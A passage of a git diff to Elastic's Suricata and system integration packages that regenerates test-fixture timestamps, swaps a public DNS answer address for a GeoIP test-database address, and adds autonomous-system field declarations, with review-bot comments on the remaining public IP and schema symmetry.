p":0,"smtp":0,"tls":0,"ssh":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"dcerpc_udp":0,"dns_udp":762}},"flow_mgr":{"closed_pruned":729,"new_pruned":1879,"est_pruned":975,"bypassed_pruned":0,"flows_checked":8,"flows_notimeout":8,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":2},"file_store":{"open_files":0},"dns":{"memuse":7749,"memcap_state":0,"memcap_global":0},"http":{"memuse":17861,"memcap":0}}} 
{"timestamp":"2018-07-05T15:51:50.666597-0400","flow_id":89751777876473,"in_iface":"en0","event_type":"tls","src_ip":"192.168.86.85","src_port":56187,"dest_ip":"17.142.164.13","dest_port":443,"proto":"TCP","tls":{"subject":"CN=*.icloud.com, OU=management:idms.group.506364, O=Apple Inc., ST=California, C=US","issuerdn":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","serial":"5C:9C:E1:09:78:87:F8:07","fingerprint":"6a:ff:ac:a6:5f:8a:05:e7:a9:8c:76:29:b9:08:c7:69:ad:dc:72:47","sni":"p33-btmmdns.icloud.com.","version":"TLS 1.2","notbefore":"2017-02-27T17:54:31","notafter":"2019-03-29T17:54:31"}} {"timestamp":"2018-07-05T15:51:54.001329-0400","flow_id":1828507008887644,"event_type":"flow","src_ip":"fe80:0000:0000:0000:fada:0cff:fedc:87f1","src_port":546,"dest_ip":"ff02:0000:0000:0000:0000:0000:0001:0002","dest_port":547,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":0,"bytes_toserver":110,"bytes_toclient":0,"start":"2018-07-05T15:51:23.453468-0400","end":"2018-07-05T15:51:23.453468-0400","age":0,"state":"new","reason":"timeout","alerted":false}} diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json index f06d26c8070..8da063a5247 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json 
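Review bot: The context line for the tls event still carries the public address `17.142.164.13` as `dest_ip`, while only the DNS `rdata` in this hunk was moved to the supported subset that the commit title describes. If the intent is that every public address in fixtures resolves in the GeoIP test database, that one should be swapped too; if destination addresses are deliberately left alone because they are not enriched, that reasoning is worth stating in the PR description so the next person regenerating fixtures does not "fix" it. Note also that `rdata` is now `175.16.199.1` while `rrname` stays `clients.l.google.com`, which is harmless for a parser test but makes the record internally implausible if this fixture is ever reused where name/address pairs matter.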
@@ -37,7 +37,7 @@
 "ip": "192.168.86.85"
 },
 "event": {
- "ingested": "2021-07-05T10:52:45.978240900Z",
+ "ingested": "2021-12-09T13:45:29.680219800Z",
 "original": "{\"timestamp\":\"2018-07-05T15:01:09.820360-0400\",\"flow_id\":298824096901438,\"in_iface\":\"en0\",\"event_type\":\"ssh\",\"src_ip\":\"192.168.86.85\",\"src_port\":55406,\"dest_ip\":\"192.168.253.112\",\"dest_port\":22,\"proto\":\"TCP\",\"ssh\":{\"client\":{\"proto_version\":\"2.0\",\"software_version\":\"OpenSSH_7.6\"},\"server\":{\"proto_version\":\"2.0\",\"software_version\":\"libssh_0.7.0\"}}}",
 "category": [
 "network"
@@ -126,7 +126,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-07-05T10:52:45.978256300Z",
+ "ingested": "2021-12-09T13:45:29.680225600Z",
 "original": "{\"timestamp\":\"2018-07-05T15:07:20.910626-0400\",\"flow_id\":904992230150281,\"in_iface\":\"en0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.86.85\",\"src_port\":55641,\"dest_ip\":\"192.168.156.70\",\"dest_port\":443,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2024833,\"rev\":3,\"signature\":\"ET POLICY Observed IP Lookup Domain (l2 .io in TLS SNI)\",\"category\":\"Potential Corporate Privacy Violation\",\"severity\":1},\"tls\":{\"session_resumed\":true,\"sni\":\"l2.io\",\"version\":\"TLS 1.2\"},\"app_proto\":\"tls\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":793,\"bytes_toclient\":343,\"start\":\"2018-07-05T15:07:19.659593-0400\"}}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "alert",
@@ -199,7 +199,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978260300Z", + "ingested": "2021-12-09T13:45:29.680230400Z", "original": "{\"timestamp\":\"2018-07-05T15:43:47.690014-0400\",\"flow_id\":2115002772430095,\"in_iface\":\"en0\",\"event_type\":\"http\",\"src_ip\":\"192.168.86.85\",\"src_port\":56119,\"dest_ip\":\"192.168.86.28\",\"dest_port\":63963,\"proto\":\"TCP\",\"tx_id\":0,\"http\":{\"hostname\":\"192.168.86.28\",\"url\":\"\\/dd.xml\",\"http_user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\",\"http_content_type\":\"text\\/xml\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1155}}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -298,7 +298,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978263600Z", + "ingested": "2021-12-09T13:45:29.680234200Z", "original": "{\"timestamp\":\"2018-07-05T15:44:33.222441-0400\",\"flow_id\":2211411903323127,\"in_iface\":\"en0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.86.28\",\"src_port\":8008,\"dest_ip\":\"192.168.86.85\",\"dest_port\":56118,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.86.28\",\"url\":\"\\/ssdp\\/device-desc.xml\",\"http_user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\",\"http_content_type\":\"application\\/xml\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1071},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/ssdp\\/device-desc.xml\",\"gaps\":false,\"state\":\"CLOSED\",\"md5\":\"427b7337ff37eeb24d74f47d8e04cf21\",\"sha1\":\"313573490192c685e9e53abef25453ed0d5e2aee\",\"sha256\":\"f610428ebddf6f8cf9e39322e672583c45fcdcf885efad0ab48fd53a3dfc2c4b\",\"stored\":false,\"size\":1071,\"tx_id\":0}}", "category": [ "network" 
@@ -329,14 +329,14 @@
 "answers": [
 {
 "name": "clients.l.google.com",
- "data": "172.217.13.110",
+ "data": "175.16.199.1",
 "type": "A",
 "ttl": 299
 }
 ],
 "response_code": "NOERROR",
 "resolved_ip": [
- "172.217.13.110"
+ "175.16.199.1"
 ],
 "id": "12308",
 "question": {
@@ -364,7 +364,7 @@
 },
 "related": {
 "ip": [
- "172.217.13.110",
+ "175.16.199.1",
 "192.168.86.1"
 ]
 },
@@ -373,7 +373,7 @@
 "in_iface": "en0",
 "dns": {
 "rrname": "clients.l.google.com",
- "rdata": "172.217.13.110",
+ "rdata": "175.16.199.1",
 "rcode": "NOERROR",
 "id": 12308,
 "type": "answer",
@@ -385,8 +385,8 @@
 }
 },
 "event": {
- "ingested": "2021-07-05T10:52:45.978266600Z",
- "original": "{\"timestamp\":\"2018-07-05T15:51:20.213418-0400\",\"flow_id\":1684780223079543,\"in_iface\":\"en0\",\"event_type\":\"dns\",\"src_ip\":\"192.168.86.1\",\"src_port\":53,\"dest_ip\":\"192.168.86.85\",\"dest_port\":39464,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":12308,\"rcode\":\"NOERROR\",\"rrname\":\"clients.l.google.com\",\"rrtype\":\"A\",\"ttl\":299,\"rdata\":\"172.217.13.110\"}}",
+ "ingested": "2021-12-09T13:45:29.680238700Z",
+ "original": "{\"timestamp\":\"2018-07-05T15:51:20.213418-0400\",\"flow_id\":1684780223079543,\"in_iface\":\"en0\",\"event_type\":\"dns\",\"src_ip\":\"192.168.86.1\",\"src_port\":53,\"dest_ip\":\"192.168.86.85\",\"dest_port\":39464,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":12308,\"rcode\":\"NOERROR\",\"rrname\":\"clients.l.google.com\",\"rrtype\":\"A\",\"ttl\":299,\"rdata\":\"175.16.199.1\"}}",
 "category": [
 "network"
 ],
@@ -562,7 +562,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978269700Z", + "ingested": "2021-12-09T13:45:29.680244100Z", "original": "{\"timestamp\":\"2018-07-05T15:51:23.009510-0400\",\"event_type\":\"stats\",\"stats\":{\"uptime\":5400,\"capture\":{\"kernel_packets\":430313,\"kernel_drops\":0,\"kernel_ifdrops\":0},\"decoder\":{\"pkts\":430313,\"bytes\":335138381,\"invalid\":2,\"ipv4\":425873,\"ipv6\":3785,\"ethernet\":430313,\"raw\":0,\"null\":0,\"sll\":0,\"tcp\":370093,\"udp\":58337,\"sctp\":0,\"icmpv4\":186,\"icmpv6\":1019,\"ppp\":0,\"pppoe\":0,\"gre\":0,\"vlan\":0,\"vlan_qinq\":0,\"ieee8021ah\":0,\"teredo\":1,\"ipv4_in_ipv6\":0,\"ipv6_in_ipv6\":0,\"mpls\":0,\"avg_pkt_size\":778,\"max_pkt_size\":1514,\"erspan\":0,\"ipraw\":{\"invalid_ip_version\":0},\"ltnull\":{\"pkt_too_small\":0,\"unsupported_type\":0},\"dce\":{\"pkt_too_small\":0}},\"flow\":{\"memcap\":0,\"tcp\":1113,\"udp\":1881,\"icmpv4\":0,\"icmpv6\":677,\"spare\":10000,\"emerg_mode_entered\":0,\"emerg_mode_over\":0,\"tcp_reuse\":0,\"memuse\":11537312},\"defrag\":{\"ipv4\":{\"fragments\":0,\"reassembled\":0,\"timeouts\":0},\"ipv6\":{\"fragments\":0,\"reassembled\":0,\"timeouts\":0},\"max_frag_hits\":0},\"tcp\":{\"sessions\":842,\"ssn_memcap_drop\":0,\"pseudo\":0,\"pseudo_failed\":0,\"invalid_checksum\":0,\"no_flow\":0,\"syn\":1138,\"synack\":656,\"rst\":1165,\"segment_memcap_drop\":0,\"stream_depth_reached\":63,\"reassembly_gap\":0,\"overlap\":5979,\"overlap_diff_data\":0,\"insert_data_normal_fail\":0,\"insert_data_overlap_fail\":0,\"insert_list_fail\":0,\"memuse\":4587520,\"reassembly_memuse\":768000},\"detect\":{\"alert\":2},\"app_layer\":{\"flow\":{\"http\":22,\"ftp\":0,\"smtp\":0,\"tls\":560,\"ssh\":4,\"imap\":0,\"msn\":0,\"smb\":0,\"dcerpc_tcp\":0,\"dns_tcp\":0,\"failed_tcp\":2,\"dcerpc_udp\":0,\"dns_udp\":762,\"failed_udp\":1119},\"tx\":{\"http\":25,\"ftp\":0,\"smtp\":0,\"tls\":0,\"ssh\":0,\"smb\":0,\"dcerpc_tcp\":0,\"dns_tcp\":0,\"dcerpc_udp\":0,\"dns_udp\":762}},\"flow_mgr\":{\"closed_pru
ned\":729,\"new_pruned\":1879,\"est_pruned\":975,\"bypassed_pruned\":0,\"flows_checked\":8,\"flows_notimeout\":8,\"flows_timeout\":0,\"flows_timeout_inuse\":0,\"flows_removed\":0,\"rows_checked\":65536,\"rows_skipped\":65530,\"rows_empty\":0,\"rows_busy\":0,\"rows_maxlen\":2},\"file_store\":{\"open_files\":0},\"dns\":{\"memuse\":7749,\"memcap_state\":0,\"memcap_global\":0},\"http\":{\"memuse\":17861,\"memcap\":0}}}", "category": [ "network" @@ -656,7 +656,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-07-05T10:52:45.978272600Z", + "ingested": "2021-12-09T13:45:29.680248300Z", "original": "{\"timestamp\":\"2018-07-05T15:51:50.666597-0400\",\"flow_id\":89751777876473,\"in_iface\":\"en0\",\"event_type\":\"tls\",\"src_ip\":\"192.168.86.85\",\"src_port\":56187,\"dest_ip\":\"17.142.164.13\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"CN=*.icloud.com, OU=management:idms.group.506364, O=Apple Inc., ST=California, C=US\",\"issuerdn\":\"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US\",\"serial\":\"5C:9C:E1:09:78:87:F8:07\",\"fingerprint\":\"6a:ff:ac:a6:5f:8a:05:e7:a9:8c:76:29:b9:08:c7:69:ad:dc:72:47\",\"sni\":\"p33-btmmdns.icloud.com.\",\"version\":\"TLS 1.2\",\"notbefore\":\"2017-02-27T17:54:31\",\"notafter\":\"2019-03-29T17:54:31\"}}", "category": [ "network" 
@@ -705,7 +705,7 @@ }, "event": { "duration": 0, - "ingested": "2021-07-05T10:52:45.978275500Z", + "ingested": "2021-12-09T13:45:29.680252400Z", "original": "{\"timestamp\":\"2018-07-05T15:51:54.001329-0400\",\"flow_id\":1828507008887644,\"event_type\":\"flow\",\"src_ip\":\"fe80:0000:0000:0000:fada:0cff:fedc:87f1\",\"src_port\":546,\"dest_ip\":\"ff02:0000:0000:0000:0000:0000:0001:0002\",\"dest_port\":547,\"proto\":\"UDP\",\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":0,\"bytes_toserver\":110,\"bytes_toclient\":0,\"start\":\"2018-07-05T15:51:23.453468-0400\",\"end\":\"2018-07-05T15:51:23.453468-0400\",\"age\":0,\"state\":\"new\",\"reason\":\"timeout\",\"alerted\":false}}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -786,7 +786,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978278500Z", + "ingested": "2021-12-09T13:45:29.680255700Z", "original": "{\"timestamp\":\"2020-12-09T16:02:43.000505+0000\",\"flow_id\":913701662641234,\"in_iface\":\"eno6\",\"event_type\":\"http\",\"src_ip\":\"192.168.50.1\",\"src_port\":57134,\"dest_ip\":\"192.168.50.1\",\"dest_port\":8080,\"proto\":\"TCP\",\"tx_id\":0,\"http\":{\"hostname\":\"ctldl.windowsupdate.com\",\"url\":\"http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?111111111111\",\"http_user_agent\":\"Microsoft-CryptoAPI/10.0\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"length\":0}}", "category": [ "network", 
@@ -891,7 +891,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-07-05T10:52:45.978281500Z", + "ingested": "2021-12-09T13:45:29.680259900Z", "original": "{\"timestamp\":\"2020-12-09T16:02:58.005716+0000\",\"flow_id\":1298574590709840,\"in_iface\":\"eno6\",\"event_type\":\"tls\",\"src_ip\":\"192.168.50.1\",\"src_port\":60614,\"dest_ip\":\"192.168.50.1\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"C=US, ST=New York, L=New York City, O=Acme U.S.A., INC., CN=update.acme.com\",\"issuerdn\":\"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018\",\"serial\":\"0D:CE:DC:BC:AF:92:56:B4:C5:41:40:71:26:5B:1D:53\",\"fingerprint\":\"18:3c:11:45:46:e9:26:c7:87:64:0f:ed:47:86:1b:31:bf:0f:84:25\",\"version\":\"TLS 1.2\",\"notbefore\":\"2020-11-24T00:00:00\",\"notafter\":\"2021-12-25T23:59:59\",\"ja3\":{},\"ja3s\":{\"hash\":\"adc06261ef82c2e4688b3cf08c1b2f24\",\"string\":\"771,159,65281\"}}}", "category": [ "network" @@ -961,7 +961,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978284300Z", + "ingested": "2021-12-09T13:45:29.680265300Z", "original": "{\"timestamp\":\"2020-12-09T16:03:00.179037+0000\",\"flow_id\":1097935193623328,\"in_iface\":\"eno6\",\"event_type\":\"http\",\"src_ip\":\"192.168.50.1\",\"src_port\":50898,\"dest_ip\":\"192.168.50.1\",\"dest_port\":8081,\"proto\":\"TCP\",\"tx_id\":0,\"http\":{\"hostname\":\"192.168.50.1\",\"http_port\":8081,\"url\":\"/uuid\",\"http_user_agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0\",\"http_method\":\"POST\",\"protocol\":\"HTTP/1.1\",\"length\":0}}", "category": [ "network", 
@@ -1038,7 +1038,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978287400Z", + "ingested": "2021-12-09T13:45:29.680271100Z", "original": "{\"timestamp\":\"2020-12-09T16:03:50.083307+0000\",\"flow_id\":289459143040794,\"in_iface\":\"eno6\",\"event_type\":\"tls\",\"src_ip\":\"192.168.50.1\",\"src_port\":12509,\"dest_ip\":\"192.168.50.1\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"sni\":\"www.example.com\",\"version\":\"UNDETERMINED\",\"ja3\":{\"hash\":\"44d502d471cfdb99c59bdfb0f220e5a8\",\"string\":\"771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,0-23-65281-10-11-35-16-5-13-18-51-45-43-27-41,29-23-24,0\"},\"ja3s\":{}}}", "category": [ "network" diff --git a/packages/suricata/data_stream/eve/fields/ecs.yml b/packages/suricata/data_stream/eve/fields/ecs.yml index da34947b3b0..fa6d117c34f 100644 --- a/packages/suricata/data_stream/eve/fields/ecs.yml +++ b/packages/suricata/data_stream/eve/fields/ecs.yml @@ -86,6 +86,10 @@ name: rule.name - external: ecs name: source.address +- external: ecs + name: source.as.number +- external: ecs + name: source.as.organization.name - external: ecs name: source.bytes - external: ecs diff --git a/packages/suricata/docs/README.md b/packages/suricata/docs/README.md index 8368369c7ea..9ed9b345a4b 100644 --- a/packages/suricata/docs/README.md +++ b/packages/suricata/docs/README.md 
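Review bot: Only `source.as.number` and `source.as.organization.name` are declared in the ecs.yml hunk, with no `destination.as.*` counterpart, so the declared schema now relies on the resolvable test address always appearing on the source side. If the ingest pipeline applies the same geoip/ASN enrichment to `destination.ip` (the pipeline is not in this diff, so I cannot confirm), a future fixture that puts `175.16.199.1` or `89.160.20.156` in `dest_ip` will emit undeclared `destination.as.*` fields and fail the pipeline test in a way that looks unrelated to the fixture edit. Declaring the destination pair next to these two, as `- external: ecs` entries for `destination.as.number` and `destination.as.organization.name`, keeps both sides symmetric; the README table at L12916 is generated and would then need to be regenerated to match.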
@@ -116,6 +116,8 @@ with other versions of Suricata. | rule.id | A rule ID that is unique within the scope of an agent, observer, or other entity using the rule for detection of this event. | keyword | | rule.name | The name of the rule or signature generating the event. | keyword | | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| source.as.organization.name | Organization name. | keyword | | source.bytes | Bytes sent from the source to the destination. | long | | source.geo.city_name | City name. | keyword | | source.geo.continent_name | Name of the continent. | keyword | diff --git a/packages/suricata/manifest.yml b/packages/suricata/manifest.yml index a65028db85a..5d76ac99ff5 100644 --- a/packages/suricata/manifest.yml +++ b/packages/suricata/manifest.yml @@ -1,6 +1,6 @@ name: suricata title: Suricata Events -version: 1.3.0 +version: 1.3.1 release: ga description: Collect and parse event logs from Suricata instances with Elastic Agent. type: integration diff --git a/packages/system/changelog.yml b/packages/system/changelog.yml index 8ea20456c43..94faf46896a 100644 --- a/packages/system/changelog.yml +++ b/packages/system/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.6.5" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.6.4" changes: - description: More consistent use of Proc Filesystem Directory settings 
diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json index fad0f47feb7..48c56ff37ae 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json @@ -24,7 +24,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624921103Z", + "ingested": "2021-12-09T13:45:36.403832700Z", "timezone": "+0000", "kind": "event" }, @@ -64,7 +64,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624923080Z", + "ingested": "2021-12-09T13:45:36.403841800Z", "timezone": "+0000", "kind": "event" }, @@ -99,7 +99,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624923572Z", + "ingested": "2021-12-09T13:45:36.403847800Z", "timezone": "+0000", "kind": "event" }, @@ -135,7 +135,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624923968Z", + "ingested": "2021-12-09T13:45:36.403853600Z", "timezone": "+0000", "kind": "event" }, @@ -175,7 +175,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624924363Z", + "ingested": "2021-12-09T13:45:36.403859600Z", "timezone": "+0000", "kind": "event" }, @@ -206,7 +206,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624924759Z", + "ingested": "2021-12-09T13:45:36.403866400Z", "timezone": "+0000", "kind": "event" }, @@ -236,7 +236,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624925169Z", + "ingested": "2021-12-09T13:45:36.403872100Z", "timezone": "+0000", "kind": "event" }, @@ -272,7 +272,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624925564Z", + "ingested": "2021-12-09T13:45:36.403878700Z", "timezone": "+0000", "kind": "event" }, 
@@ -305,7 +305,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624925954Z", + "ingested": "2021-12-09T13:45:36.403884200Z", "timezone": "+0000", "kind": "event" }, @@ -327,7 +327,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-30T21:06:01.624926346Z", + "ingested": "2021-12-09T13:45:36.403889300Z", "timezone": "+0000", "kind": "event" }, @@ -364,7 +364,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624926738Z", + "ingested": "2021-12-09T13:45:36.403895200Z", "timezone": "+0000", "kind": "event" }, @@ -399,7 +399,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624927274Z", + "ingested": "2021-12-09T13:45:36.403900Z", "timezone": "+0000", "kind": "event" }, @@ -433,7 +433,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624927670Z", + "ingested": "2021-12-09T13:45:36.403904600Z", "timezone": "+0000", "kind": "event" }, @@ -463,7 +463,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624928073Z", + "ingested": "2021-12-09T13:45:36.403908300Z", "timezone": "+0000", "kind": "event" }, @@ -508,7 +508,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.624928465Z", + "ingested": "2021-12-09T13:45:36.403913200Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -550,7 +550,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624928854Z", + "ingested": "2021-12-09T13:45:36.403918200Z", "timezone": "+0000", "kind": "event" }, @@ -594,7 +594,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624929424Z", + "ingested": "2021-12-09T13:45:36.403923400Z", "timezone": "+0000", "kind": "event" }, @@ -636,7 +636,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624929833Z", + "ingested": "2021-12-09T13:45:36.403928300Z", "timezone": "+0000", "kind": "event" }, 
@@ -671,7 +671,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624930222Z", + "ingested": "2021-12-09T13:45:36.403934400Z", "timezone": "+0000", "kind": "event" }, @@ -707,7 +707,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624930614Z", + "ingested": "2021-12-09T13:45:36.403938800Z", "timezone": "+0000", "kind": "event" }, @@ -752,7 +752,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.624969294Z", + "ingested": "2021-12-09T13:45:36.403943300Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -794,7 +794,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624970822Z", + "ingested": "2021-12-09T13:45:36.403947400Z", "timezone": "+0000", "kind": "event" }, @@ -828,7 +828,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624971279Z", + "ingested": "2021-12-09T13:45:36.403952400Z", "timezone": "+0000", "kind": "event" }, @@ -858,7 +858,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624988375Z", + "ingested": "2021-12-09T13:45:36.403958200Z", "timezone": "+0000", "kind": "event" }, @@ -891,7 +891,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624989005Z", + "ingested": "2021-12-09T13:45:36.403964100Z", "timezone": "+0000", "kind": "event" }, @@ -928,7 +928,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624989402Z", + "ingested": "2021-12-09T13:45:36.403969800Z", "timezone": "+0000", "kind": "event" }, @@ -973,7 +973,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.624989793Z", + "ingested": "2021-12-09T13:45:36.403975600Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1015,7 +1015,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624990186Z", + "ingested": "2021-12-09T13:45:36.403980100Z", "timezone": "+0000", "kind": "event" }, 
@@ -1049,7 +1049,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624990575Z", + "ingested": "2021-12-09T13:45:36.403984700Z", "timezone": "+0000", "kind": "event" }, @@ -1079,7 +1079,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624990961Z", + "ingested": "2021-12-09T13:45:36.404006300Z", "timezone": "+0000", "kind": "event" }, @@ -1119,7 +1119,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624991355Z", + "ingested": "2021-12-09T13:45:36.404010700Z", "timezone": "+0000", "kind": "event" }, @@ -1154,7 +1154,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624991765Z", + "ingested": "2021-12-09T13:45:36.404035700Z", "timezone": "+0000", "kind": "event" }, @@ -1191,7 +1191,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624992160Z", + "ingested": "2021-12-09T13:45:36.404040500Z", "timezone": "+0000", "kind": "event" }, @@ -1228,7 +1228,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624992560Z", + "ingested": "2021-12-09T13:45:36.404045800Z", "timezone": "+0000", "kind": "event" }, @@ -1260,7 +1260,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624993093Z", + "ingested": "2021-12-09T13:45:36.404050100Z", "timezone": "+0000", "kind": "event" }, @@ -1293,7 +1293,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624993500Z", + "ingested": "2021-12-09T13:45:36.404059900Z", "timezone": "+0000", "kind": "event" }, @@ -1326,7 +1326,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624993890Z", + "ingested": "2021-12-09T13:45:36.404065100Z", "timezone": "+0000", "kind": "event" }, @@ -1363,7 +1363,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624994309Z", + "ingested": "2021-12-09T13:45:36.404070200Z", "timezone": "+0000", "kind": "event" }, 
@@ -1408,7 +1408,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.624995961Z", + "ingested": "2021-12-09T13:45:36.404075200Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1450,7 +1450,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624996388Z", + "ingested": "2021-12-09T13:45:36.404102300Z", "timezone": "+0000", "kind": "event" }, @@ -1494,7 +1494,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624996809Z", + "ingested": "2021-12-09T13:45:36.404112700Z", "timezone": "+0000", "kind": "event" }, @@ -1529,7 +1529,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624997206Z", + "ingested": "2021-12-09T13:45:36.404118800Z", "timezone": "+0000", "kind": "event" }, @@ -1565,7 +1565,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624997598Z", + "ingested": "2021-12-09T13:45:36.404124800Z", "timezone": "+0000", "kind": "event" }, @@ -1595,7 +1595,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624997984Z", + "ingested": "2021-12-09T13:45:36.404130700Z", "timezone": "+0000", "kind": "event" }, @@ -1625,7 +1625,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624998382Z", + "ingested": "2021-12-09T13:45:36.404136500Z", 